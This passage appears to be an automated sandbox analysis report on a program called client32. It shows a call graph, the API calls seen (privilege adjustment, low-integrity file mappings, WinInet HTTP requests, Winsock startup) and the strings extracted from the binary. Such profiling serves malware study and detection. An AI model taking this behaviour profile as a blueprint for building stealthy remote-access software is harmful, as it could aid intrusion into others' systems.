11141842 84256->84257 84258 1113f670 RegQueryValueExA 84257->84258 84261 111418e1 84257->84261 84259 111418b8 84258->84259 84260 1113f670 RegQueryValueExA 84259->84260 84260->84261 84261->84247 84262->84061 84263->84079 84264->84087 84266 1110c536 CreateEventA 84265->84266 84267 1110c549 84265->84267 84266->84267 84271 1110c557 84267->84271 84274 1110c260 InterlockedIncrement 84267->84274 84268 111042dc 84268->84197 84271->84268 84275 1110c3c0 InterlockedIncrement 84271->84275 84272->84210 84273->84212 84274->84271 84275->84268 84373 110b6cd0 84277->84373 84279 1110cd7e GetCurrentThreadId 84375 1110c340 84279->84375 84281 1110ce10 84382 1110c370 SetEvent PulseEvent 84281->84382 84283 1110cdb0 WaitForSingleObject 84380 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 84283->84380 84284 1110ce1a 84286 1110cdd3 84287 1110cde3 PostMessageA 84286->84287 84288 1110cde8 PostThreadMessageA 84286->84288 84289 1110cd99 84287->84289 84288->84289 84289->84281 84289->84283 84289->84286 84381 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 84289->84381 84292 11026f12 84291->84292 84293 110883c0 5 API calls 84292->84293 84294 11026f19 CreateEventA 84293->84294 84295 1110c420 261 API calls 84294->84295 84296 11026f36 84295->84296 84297 11026f57 84296->84297 84384 1110d060 84296->84384 84299 1110c340 262 API calls 84297->84299 84307 11026f6f 84299->84307 84300 11026f86 WaitForMultipleObjects 84301 11026f9d 84300->84301 84300->84307 84302 11026fa6 PostMessageA 84301->84302 84303 11026fba SetEvent Sleep 84301->84303 84302->84303 84302->84307 84303->84307 84304 11027064 84306 1102707e CloseHandle 84304->84306 84413 1110cc00 274 API calls 84304->84413 84305 11026fe5 PostMessageA 84305->84307 84414 1110c370 SetEvent PulseEvent 84306->84414 84307->84300 84307->84304 84307->84305 84313 1102702a GetCurrentThreadId GetThreadDesktop 84307->84313 84412 11026ec0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 84307->84412 84310 
11027075 84310->84306 84311 11027093 84313->84307 84314 11027039 SetThreadDesktop 84313->84314 84314->84307 84315 11027044 CloseDesktop 84314->84315 84315->84307 84317 1102c062 84316->84317 84318 1110c340 262 API calls 84317->84318 84319 1102c06f WaitForSingleObject 84318->84319 84320 1102c086 84319->84320 84321 1102c29d 84319->84321 84323 1102c090 GetTickCount 84320->84323 84324 1102c286 WaitForSingleObject 84320->84324 84502 1110c370 SetEvent PulseEvent 84321->84502 84418 110cf410 84323->84418 84324->84320 84324->84321 84325 1102c2a4 CloseHandle 84503 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 84325->84503 84328 1102c2b5 84329 110cf410 264 API calls 84340 1102c0a6 84329->84340 84331 1102c2d4 84504 110290f0 261 API calls 84331->84504 84333 1102c2e8 84505 110290f0 261 API calls 84333->84505 84335 1102c2fc 84506 110290f0 261 API calls 84335->84506 84338 1102c310 84507 110290f0 261 API calls 84338->84507 84339 1102c194 GetTickCount 84349 1102c191 84339->84349 84340->84329 84340->84331 84340->84333 84340->84335 84340->84339 84428 110ce440 84340->84428 84440 11029230 LoadLibraryA 84340->84440 84491 110cf0a0 265 API calls 84340->84491 84344 11142a60 21 API calls 84344->84349 84345 110ce4f0 261 API calls 84345->84349 84346 1113e8f0 261 API calls 84346->84349 84349->84331 84349->84333 84349->84338 84349->84339 84349->84344 84349->84345 84349->84346 84350 11066f60 294 API calls 84349->84350 84492 11041cc0 263 API calls 84349->84492 84493 110ce4f0 84349->84493 84350->84349 84352 110883c0 5 API calls 84351->84352 84353 110ffe6d 84352->84353 84354 110ffe79 GetCurrentThreadId GetThreadDesktop OpenDesktopA 84353->84354 84355 110ffedf GetLastError 84354->84355 84356 110ffe9f SetThreadDesktop 84354->84356 84357 11142a60 21 API calls 84355->84357 84358 110ffeaa 84356->84358 84359 110ffec1 GetLastError 84356->84359 84361 110ffef1 84357->84361 84362 11142a60 21 API calls 84358->84362 84360 11142a60 21 API calls 84359->84360 84363 110ffed3 
CloseDesktop 84360->84363 84652 110ffde0 84361->84652 84364 110ffeb5 CloseDesktop 84362->84364 84363->84361 84364->84361 84366 110ffefb 84367 1110c340 262 API calls 84366->84367 84368 110fff02 84367->84368 84658 110f2460 16 API calls 84368->84658 84370 110fff09 84659 1110c370 SetEvent PulseEvent 84370->84659 84372 110fff10 84374 110b6cd8 84373->84374 84374->84279 84376 1110c360 SetEvent 84375->84376 84377 1110c349 84375->84377 84376->84289 84383 110290f0 261 API calls 84377->84383 84380->84289 84381->84289 84382->84284 84385 1110c420 261 API calls 84384->84385 84386 1110d091 84385->84386 84387 1110d0b3 GetCurrentThreadId InitializeCriticalSection 84386->84387 84388 1110c420 261 API calls 84386->84388 84391 1110d120 EnterCriticalSection 84387->84391 84392 1110d113 InitializeCriticalSection 84387->84392 84390 1110d0ac 84388->84390 84390->84387 84415 1115e96a 34 API calls 84390->84415 84393 1110d1da LeaveCriticalSection 84391->84393 84394 1110d14e CreateEventA 84391->84394 84392->84391 84393->84297 84396 1110d161 84394->84396 84397 1110d178 84394->84397 84417 110290f0 261 API calls 84396->84417 84398 1110c420 261 API calls 84397->84398 84402 1110d17f 84398->84402 84399 1110d0cf 84416 1115edc1 RaiseException 84399->84416 84404 1110d19c 84402->84404 84405 1110d060 414 API calls 84402->84405 84406 1110c420 261 API calls 84404->84406 84405->84404 84407 1110d1ac 84406->84407 84408 1110d1bd 84407->84408 84409 1110c520 3 API calls 84407->84409 84410 1110c2b0 414 API calls 84408->84410 84409->84408 84411 1110d1d5 84410->84411 84411->84393 84412->84307 84413->84310 84414->84311 84415->84399 84416->84387 84508 110cf1b0 84418->84508 84421 110cf45b 84423 110cf475 84421->84423 84424 110cf458 84421->84424 84422 110cf444 84522 110290f0 261 API calls 84422->84522 84423->84340 84424->84421 84523 110290f0 261 API calls 84424->84523 84429 110ce454 84428->84429 84430 11161dd7 34 API calls 84429->84430 84431 110ce45f 84430->84431 84432 110ce180 261 API calls 84431->84432 84484 110292c1 
84440->84484 84441 110292f3 GetProcAddress 84444 11029311 SetLastError 84441->84444 84441->84484 84442 110293e8 InternetOpenA 84442->84484 84443 110293cf GetProcAddress 84443->84442 84445 11029419 SetLastError 84443->84445 84444->84484 84445->84484 84446 11029345 GetProcAddress 84447 11029402 SetLastError 84446->84447 84446->84484 84448 11029372 GetLastError 84447->84448 84448->84484 84449 1113e8f0 261 API calls 84449->84484 84450 1115f3b5 23 API calls 84450->84484 84451 11029395 GetProcAddress 84452 1102940f SetLastError 84451->84452 84451->84484 84452->84484 84453 110296e0 84457 11029816 GetProcAddress 84453->84457 84458 110296d1 84453->84458 84454 11029850 84454->84349 84455 11029849 FreeLibrary 84455->84454 84456 110296f7 GetProcAddress 84459 110297ce SetLastError 84456->84459 84462 110296ba 84456->84462 84457->84458 84458->84454 84458->84455 84480 110297d6 84459->84480 84461 11080b10 IsDBCSLeadByte 84461->84484 84462->84453 84462->84456 84462->84458 84479 11029728 84462->84479 84462->84480 84465 1110c4a0 261 API calls 84465->84479 84467 1102949f GetProcAddress 84471 110294bc SetLastError 84467->84471 84467->84484 84468 110294cb GetProcAddress 84469 110294de InternetConnectA 84468->84469 84473 11029521 SetLastError 84468->84473 84469->84484 84471->84484 84473->84484 84474 11029504 GetProcAddress 84476 11029531 SetLastError 84474->84476 84474->84484 84475 11029543 GetProcAddress 84477 11029576 SetLastError 84475->84477 84475->84484 84476->84484 84477->84484 84478 110cedc0 264 API calls 84478->84479 84479->84462 84479->84465 84479->84478 84479->84480 84644 110274c0 GetProcAddress SetLastError 84479->84644 84645 11027510 GetProcAddress SetLastError 84480->84645 84481 11029591 GetProcAddress 84482 110295b8 SetLastError 84481->84482 84481->84484 84483 110295c2 GetLastError 84482->84483 84483->84484 84485 110295dd GetProcAddress 84483->84485 84484->84441 84484->84442 84484->84443 84484->84446 84484->84448 84484->84449 84484->84450 84484->84451 84484->84461 
84484->84462 84484->84467 84484->84468 84484->84469 84484->84474 84484->84475 84484->84481 84484->84483 84487 11029615 GetLastError 84484->84487 84488 1102962c GetDesktopWindow 84484->84488 84485->84484 84486 1102960d SetLastError 84485->84486 84486->84487 84487->84484 84487->84488 84488->84484 84489 1102963a GetProcAddress 84488->84489 84489->84484 84490 11029676 SetLastError 84489->84490 84490->84484 84491->84340 84492->84349 84647 110ce2f0 84493->84647 84502->84325 84503->84328 84509 110cf1bc 84508->84509 84510 110cf1d7 84509->84510 84511 110cf1c0 84509->84511 84524 110cdeb0 84510->84524 84553 110290f0 261 API calls 84511->84553 84518 110cf20e 84518->84421 84518->84422 84519 110cf1f7 84554 110290f0 261 API calls 84519->84554 84525 110cdeb9 84524->84525 84526 110cdebd 84525->84526 84527 110cded4 84525->84527 84555 110290f0 261 API calls 84526->84555 84529 110cded1 84527->84529 84530 110cdf08 84527->84530 84529->84527 84556 110290f0 261 API calls 84529->84556 84532 110cdf05 84530->84532 84533 110cdf26 84530->84533 84532->84530 84557 110290f0 261 API calls 84532->84557 84536 110cedc0 84533->84536 84537 110cedce 84536->84537 84538 110cede9 84537->84538 84539 110cedd2 84537->84539 84541 110cee1c 84538->84541 84543 110cede6 84538->84543 84589 110290f0 261 API calls 84539->84589 84542 110cee90 84541->84542 84558 110ce710 84541->84558 84542->84518 84542->84519 84543->84538 84590 110290f0 261 API calls 84543->84590 84549 110cee4f 84549->84542 84550 110cee79 84549->84550 84591 110290f0 261 API calls 84550->84591 84559 110ce71d 84558->84559 84560 110ce738 84559->84560 84561 110ce721 84559->84561 84563 110ce735 84560->84563 84564 110ce756 84560->84564 84597 110290f0 261 API calls 84561->84597 84563->84560 84598 110290f0 261 API calls 84563->84598 84592 110ce180 84564->84592 84569 110ce650 84570 110ce65c 84569->84570 84571 110ce677 84570->84571 84572 110ce660 84570->84572 84574 110ce697 84571->84574 84575 110ce674 84571->84575 84619 110290f0 261 API calls 84572->84619 
84575->84571 84593 110ce18b 84592->84593 84594 110ce1a2 84592->84594 84599 110290f0 261 API calls 84593->84599 84594->84549 84594->84569 84644->84479 84648 110ce31c 84647->84648 84649 110ce309 84647->84649 84649->84648 84653 1110c420 261 API calls 84652->84653 84654 110ffe0d 84653->84654 84655 110ffe40 84654->84655 84660 110ffcc0 84654->84660 84655->84366 84657 110ffe2d 84657->84366 84658->84370 84659->84372 84667 1115bd20 84660->84667 84663 110ffd27 84665 110ffd60 GetStockObject RegisterClassA 84663->84665 84664 110ffd91 CreateWindowExA 84664->84657 84665->84664 84666 110ffd8a 84665->84666 84666->84664 84670 1115ab80 GlobalAddAtomA 84667->84670 84671 1115abb5 GetLastError wsprintfA 84670->84671 84672 1115ac07 GlobalAddAtomA GlobalAddAtomA 84670->84672 84679 110290f0 261 API calls 84671->84679 84674 1115e4d1 5 API calls 84672->84674 84676 110ffcf1 GlobalAddAtomA 84674->84676 84676->84663 84676->84664 84681 1109dc40 GetTokenInformation 84680->84681 84686 1109dcd6 84680->84686 84683 1109dc62 84681->84683 84682 1115e4d1 5 API calls 84684 1109dce8 84682->84684 84685 1109dc68 GetTokenInformation 84683->84685 84683->84686 84684->84228 84685->84686 84687 1109dc7a 84685->84687 84686->84682 84688 1109dcaf EqualSid 84687->84688 84689 1109dc83 AllocateAndInitializeSid 84687->84689 84688->84686 84690 1109dcbd 84688->84690 84689->84686 84689->84688 84691 1115e4d1 5 API calls 84690->84691 84692 1109dcd2 84691->84692 84692->84228 84694 1116021d 84693->84694 84695 1116020b 84693->84695 84708 111601ac 75 API calls 84694->84708 84695->84253 84697 11160227 84697->84253 84699 11080d0d 84698->84699 84700 11080d12 84698->84700 84709 11080a30 IsDBCSLeadByte 84699->84709 84702 11080d1b 84700->84702 84703 11080d33 84700->84703 84710 1115ff54 81 API calls 84702->84710 84705 11080d39 84703->84705 84707 11161f66 81 API calls 84703->84707 84705->84245 84706 11080d2c 84706->84245 84707->84703 84708->84697 84709->84700 84710->84706 84711->84103 84712->84097 84713->84110 84714->84114 84715->84113 
84716->84114 84718 111610dd 84717->84718 84719 111610f6 84717->84719 84718->84719 84750 1116c9b8 8 API calls 84718->84750 84721 11161d95 84719->84721 84751 1116fe36 LeaveCriticalSection 84721->84751 84723 11161ce2 84724 11161a47 84723->84724 84742->84123 84743->84128 84750->84719 84751->84723 84879 1113f146 84878->84879 84880 1113f203 84879->84880 84881 11080b10 IsDBCSLeadByte 84879->84881 84880->84150 84882 1113f16b 84881->84882 84883 11080b10 IsDBCSLeadByte 84882->84883 84884 1113f19b 84883->84884 84884->84150 84898 11112b00 84916 11141990 84898->84916 84901 11112b45 84902 11112b54 CoInitialize CoCreateInstance 84901->84902 84903 11112b28 84901->84903 84905 11112b84 LoadLibraryA 84902->84905 84915 11112b79 84902->84915 84906 1115e4d1 5 API calls 84903->84906 84904 11141710 86 API calls 84904->84901 84908 11112ba0 GetProcAddress 84905->84908 84905->84915 84907 11112b36 84906->84907 84911 11112bb0 SHGetSettings 84908->84911 84912 11112bc4 FreeLibrary 84908->84912 84909 11112c61 CoUninitialize 84910 11112c67 84909->84910 84913 1115e4d1 5 API calls 84910->84913 84911->84912 84912->84915 84914 11112c76 84913->84914 84915->84909 84915->84910 84917 11141710 86 API calls 84916->84917 84918 11112b1e 84917->84918 84918->84901 84918->84903 84918->84904 84919 11017610 GetTickCount 84926 11017520 84919->84926 84924 11142a60 21 API calls 84925 11017657 84924->84925 84927 11017540 84926->84927 84928 110175f6 84926->84928 84929 11017562 CoInitialize 84927->84929 84931 11017559 WaitForSingleObject 84927->84931 84930 1115e4d1 5 API calls 84928->84930 84954 111585e0 84929->84954 84933 11017605 84930->84933 84931->84929 84940 11017440 84933->84940 84934 110175f0 CoUninitialize 84934->84928 84935 11017591 84936 110175dc 84935->84936 84938 111601fd 75 API calls 84935->84938 84939 110175e2 84935->84939 84966 11160007 35 API calls 84936->84966 84938->84935 84939->84928 84939->84934 84941 11017460 84940->84941 84949 11017506 84940->84949 84943 11017478 CoInitialize 84941->84943 84945 

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,BBC4A55B,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                                                                                      • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                                                                                      • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                                                                                      • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,BBC4A55B,00080000,00000000,00000000), ref: 1109D535
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 1109D570
                                                                                                                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
                                                                                                                                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D64D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D676
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D683
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D6A0
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D6E9
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D6F6
                                                                                                                                                                                                      • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
                                                                                                                                                                                                      • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D7EB
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D7F8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1109D818
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1109D8C4
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D934
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D93B
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D979
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA35
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView
                                                                                                                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,BBC4A55B,75C223A0,?,00000000), ref: 11029265
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029313
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 11029372
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
                                                                                                                                                                                                    • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029404
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029411
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102941B
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110294BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
                                                                                                                                                                                                    • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029523
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110297D0
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029839
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1102984A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorLast$FreeInternetLibrary$ConnectHeapLoadOpen
                                                                                                                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 893 689c7030-689c7050 call 689b2a90 call 689cdbd0 898 689c7097 893->898 899 689c7052-689c7095 LoadLibraryA 893->899 900 689c7099-689c70f8 call 689b8d00 InitializeCriticalSection CreateEventA 898->900 899->900 903 689c70fa-689c710e call 689b6f50 900->903 904 689c7111-689c711e CreateEventA 900->904 903->904 906 689c7137-689c7144 CreateEventA 904->906 907 689c7120-689c7134 call 689b6f50 904->907 910 689c715d-689c7170 WSAStartup 906->910 911 689c7146-689c715a call 689b6f50 906->911 907->906 912 689c7172-689c7182 call 689b5290 call 689b2b70 910->912 913 689c7183-689c71b2 call 689d1b69 910->913 911->910 922 689c71b4-689c71cd call 689b6f50 913->922 923 689c71d0-689c71e4 call 689d1c50 913->923 922->923 929 689c71fa-689c7202 923->929 930 689c71e6-689c71e9 923->930 931 689c7209-689c7223 call 689d3753 929->931 932 689c7204 929->932 930->929 933 689c71eb-689c71f1 930->933 937 689c723c-689c7255 call 689c9bf0 931->937 938 689c7225-689c7239 call 689b6f50 931->938 932->931 933->929 934 689c71f3-689c71f8 933->934 934->931 943 689c726a-689c7271 call 689b5730 937->943 944 689c7257-689c725e 937->944 938->937 948 689c730b-689c7310 943->948 949 689c7277-689c729a call 689d1b69 943->949 945 689c7260-689c7268 944->945 945->943 945->945 950 689c731e-689c7336 call 689b5e90 call 689b5530 948->950 951 689c7312-689c7315 948->951 957 689c729c-689c72bb call 689b6f50 949->957 958 689c72be-689c72dc call 689d1c50 call 689d1b69 949->958 956 689c7339-689c7354 call 689b5e90 950->956 951->950 954 689c7317-689c731c 951->954 954->950 954->956 969 689c7356-689c735c 956->969 970 689c7361-689c738b GetTickCount CreateThread 956->970 957->958 977 689c72de-689c72f7 call 689b6f50 958->977 978 689c72fa-689c7308 call 689d1c50 958->978 969->970 972 689c738d-689c73a6 call 689b6f50 970->972 973 
689c73a9-689c73b6 SetThreadPriority 970->973 972->973 975 689c73cf-689c73ed call 689b5f20 call 689b5e90 973->975 976 689c73b8-689c73cc call 689b6f50 973->976 990 689c73ef 975->990 991 689c73f5-689c73f7 975->991 976->975 977->978 978->948 990->991 992 689c73f9-689c7407 call 689cdbd0 991->992 993 689c7425-689c7447 GetModuleFileNameA call 689b2420 991->993 998 689c741e 992->998 999 689c7409-689c741c call 689b4580 992->999 1000 689c744c 993->1000 1001 689c7449-689c744a 993->1001 1003 689c7420 998->1003 999->1003 1004 689c7451-689c746d 1000->1004 1001->1004 1003->993 1006 689c7470-689c747f 1004->1006 1006->1006 1007 689c7481-689c7486 1006->1007 1008 689c7487-689c748d 1007->1008 1008->1008 1009 689c748f-689c74c8 GetPrivateProfileIntA GetModuleHandleA 1008->1009 1010 689c74ce-689c74fa call 689b5e90 * 2 1009->1010 1011 689c7563-689c758f CreateMutexA timeBeginPeriod 1009->1011 1016 689c74fc-689c7511 call 689b5e90 1010->1016 1017 689c7536-689c755d call 689b5e90 * 2 1010->1017 1022 689c752a-689c7530 1016->1022 1023 689c7513-689c7528 call 689b5e90 1016->1023 1017->1011 1022->1017 1023->1017 1023->1022
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 689B2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 689B2ACB
                                                                                                                                                                                                      • Part of subcall function 689B2A90: wsprintfA.USER32 ref: 689B2B05
                                                                                                                                                                                                      • Part of subcall function 689CDBD0: wsprintfA.USER32 ref: 689CDC04
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll), ref: 689C7057
                                                                                                                                                                                                      • Part of subcall function 689D1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(689FB898), ref: 689C70DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689C70EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689C7115
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689C713B
                                                                                                                                                                                                    • WSAStartup.WSOCK32(00000101,689FB91A), ref: 689C7167
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C7361
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,689C6BA0,00000000,00000000,689FBACC), ref: 689C737E
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 689C73AC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\Support\,00000104), ref: 689C7430
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 689C74B0
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(nsmtrace), ref: 689C74C0
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 689C7566
                                                                                                                                                                                                    • timeBeginPeriod.WINMM(00000001), ref: 689C7573
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$EventModule$FileNameThreadwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTicktime
